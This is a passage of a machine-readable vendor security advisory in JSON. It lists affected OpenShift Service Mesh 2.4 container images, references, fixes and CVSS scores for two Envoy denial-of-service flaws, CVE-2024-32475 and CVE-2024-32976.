"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-32475"
},
{
"category": "external",
"summary": "RHBZ#2276149",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2276149"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-32475",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-32475"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-32475",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-32475"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/commit/b47fc6648d7c2dfe0093a601d44cb704b7bad382",
"url": "https://github.com/envoyproxy/envoy/commit/b47fc6648d7c2dfe0093a601d44cb704b7bad382"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-3mh5-6q8v-25wj",
"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-3mh5-6q8v-25wj"
}
],
"release_date": "2024-04-18T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:22:37+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7724"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "envoy: abnormal termination when using auto_sni with authority header longer than 255 characters"
},
{
"cve": "CVE-2024-32976",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-05-24T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2283145"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Envoy\u0027s Brotli decompressor. This flaw allows a remote, unauthenticated attacker to trigger an infinite loop, causing a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "envoy: Brotli decompressor infinite loop",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-32976"
},
{
"category": "external",
"summary": "RHBZ#2283145",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2283145"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-32976",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-32976"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-32976",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-32976"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-7wp5-c2vq-4f8m",
"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-7wp5-c2vq-4f8m"
}
],
"release_date": "2024-06-04T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:22:37+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7724"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
